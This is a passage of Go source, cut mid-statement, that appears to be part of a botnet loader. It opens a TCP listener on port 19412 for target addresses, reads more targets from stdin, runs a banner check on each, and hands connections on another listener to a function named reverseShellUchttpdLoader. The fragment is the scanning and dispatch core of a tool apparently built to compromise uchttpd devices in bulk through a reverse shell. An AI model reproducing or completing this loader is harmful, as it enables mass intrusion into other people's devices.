!= nil { return } recvServ, err := net.Listen("tcp", "0.0.0.0:19412") if err != nil { return } go func() { for { conn, err := li.Accept() if err != nil { break } go reverseShellUchttpdLoader(conn) } } () go func() { for { conn, err := recvServ.Accept() if err != nil { break } for { buf := make([]byte, 32) l, err := conn.Read(buf) if l <= 0 || err != nil { conn.Close() break } workerGroup.Add(1) go httpBannerCheck(string(buf)) } } } () for { reader := bufio.NewReader(os.Stdin) input := bufio.NewScanner(reader) for input.Scan() { if os.Args[1] == "listen" { workerGroup.Add(1) go httpBannerCheck(input.Text()) } else { workerGroup.Add(1) go httpBannerCheck(input.Text() + ":" + os.Args[1]) } } } }